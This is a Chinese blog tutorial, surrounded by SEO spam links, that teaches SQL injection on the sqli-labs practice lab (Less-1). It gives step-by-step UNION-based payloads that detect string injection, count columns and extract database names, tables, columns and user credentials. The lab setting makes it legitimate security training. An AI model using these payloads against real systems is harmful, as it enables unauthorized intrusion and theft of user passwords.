当前位置: 首页 > wzjs >正文

景德镇建站公司站长工具星空传媒

景德镇建站公司,站长工具星空传媒,网站开发的设计思路,怎么做网站的外部连接判断注入类型 (1)首先判断是否存在sql注入点 对id1的参数修改为id1,来判断是否存在sql注入点。因为通过加入,使后台的sql语句中单引号个数不匹配来导致sql语句报错。 如果不报错的话,也不一定是不存在sql注入点,也有可…

判断注入类型

(1)首先判断是否存在sql注入点
对id=1的参数修改为id=1',来判断是否存在sql注入点。因为通过加入',使后台的sql语句中单引号个数不匹配来导致sql语句报错。
如果不报错的话,也不一定是不存在sql注入点,也有可能是因为后端对'进行
了过滤。
(2)判断是什么注入类型
分为2种,为字符型注入和数字型注入。
1.使用id=1 and 1=1与id=1 and 1=2来判断数字型的注入。
如果后端是一个sql的查询语句,那么我们传入id参数后,后端的解析代码为:
select * from <表名> where id = x and 1=1,这里进行了与操作,因为1=1,所以最后的返回结果是正确的。
select * from <表名> where id = x and 1=2,这里也进行了与操作,但是最后1=2是错,所以与操作后,最后的结果是错,就会进行报错,从而验证是否为数字型注入。
再来看对于字符型注入来说:
select * from <表名> where id = 'x and 1=1',这里因为加上了单引号,所以对于后面的与操作就不再表示与操作,而是全部转换为字符串进行解析。
2.使用id=1' and '1'='1与id=1' and '1'='2来判断是否为字符型注入
一样的判断方法,如果后端是一个sql查询语句,我们传入前面对应的id参数后,后端的解析代码为:
select * from <表名> where id ='x' and '1'='1',这样我们传入的id参数是最后执行的sql语句语法正确,最后的判断结果为正从而正常执行返回正常结果。
select * from <表名> where id ='x' and '1'='2',这样判断后的结果为否,从而不能正常执行sql语句,最后爆出sql语法的错误。

下面通过sqli-labs靶场对sql注入漏洞进行练习。
#less-1
前面知道了大概的判断方法,我们先判断这关是sql注入的哪种类型。
输入id=1,
在这里插入图片描述
我们得到了一个正常的回显,下面我们输入id=1’,来判断是否存在sql注入的漏洞。
在这里插入图片描述
报了sql语法的错误,说明存在sql注入的漏洞,我们下面测试是什么类型的sql注入。
进行数字型的sql注入判断:
id=1 and 1=1
在这里插入图片描述
正常回显了。
再输入id =1 and 1=2
在这里插入图片描述
也是正常回显,要求我们输入带有数字值的id。
那下面尝试字符型的注入:
id=1’ and ‘1’ = '1

在这里插入图片描述
回显正常,那再试
id =1’ and ‘1’ = ‘2
在这里插入图片描述
没有回显了,确定是字符型的注入。
知道是字符型注入就继续判断字段数。
输入 id =1’ order by 3 --+
在这里插入图片描述
回显没有报错,再试着输入4来判断是否为4个字段数。
id=1’ order by 4–+
在这里插入图片描述
报错,所以字段数应该为3.
下面进行查看显示位:
id= -1’ union select 1,2,3–+
在这里插入图片描述
回显的字段为2,3。这里输入-1,是为了让后台查询中,因为sql中没有-1,所以执行联合查询的后面语句。
知道了回显位,我们进行爆数据库。
id=-1’ union select 1,database(),version() --+
在这里插入图片描述
回显出了对应的数据库名称与数据库版本。
然后对输出的security数据库进行报表。
id=-1’ union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=‘security’–+
在这里插入图片描述
回显了对应的数据库下的表。
我们可以对users表中的字段名进行查询。
id=-1’ union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=‘security’ and table_name=‘users’–+
在这里插入图片描述
然后输出对应的字段名的数据。
id=-1’ union select 1,2,group_concat(id,username,password) from users --+
在这里插入图片描述
输出了对应的信息。

对源代码的分析

找到了对应的源代码,进行分析
在这里插入图片描述
对图片中后台sql查询的代码分析,可以看到这个闭合的方式单引号闭合。并且没有做其他的过滤,造成了sql注入。

http://www.dtcms.com/wzjs/442267.html

相关文章:

  • 做网站要那些设备制作网页完整步骤代码
  • 网站促销广告学seo网络推广
  • 网站制作商城广告联盟全自动赚钱系统
  • 建设网站审批手续最新的域名网站
  • 政府部门网站建设需求营销活动有哪些
  • 珠宝类网站建设廊坊百度关键词优化
  • 东莞做网站 自媒体免费的网站推广软件下载
  • 建设银行北京市分行网站百度怎么投放自己的广告
  • 凡科是免费做网站吗googleplay官网
  • 电子商务平台(网站)建设方式大的网站建设公司
  • 网站做贩卖毕业论文合法吗百度关键词排行榜
  • 想找人做公司网站要注意什么sem优化公司
  • 巴中哪里做网站淄博seo公司
  • 上海公司注册核名官网百度刷排名seo
  • 网站在线建设南京百度
  • 工业网站建设广告联盟怎么赚钱
  • 织梦网站如何做301跳转在哪里查关键词排名
  • 连云港建设工程安全网站站长seo推广
  • 怎么用dwcs6做网站设计键词优化排名
  • 学做ps的软件的网站产品推广文案范例
  • 佛山网站建设 合优网站标题优化排名
  • wordpress js写法抖音关键词优化排名靠前
  • 手机移动网站开发打开app下载
  • 如何评价一个网站国内搜索引擎排名2022
  • 大连网络建站模板整站seo定制
  • 介绍做ppt高大上图表的网站百家号排名
  • 做门窗的建网站怎么赚钱网址大全下载
  • 做钻石资讯网站广州优化营商环境条例
  • vps建设网站百度导航怎么下载
  • 解析网站接口怎么做如何在百度搜索到自己的网站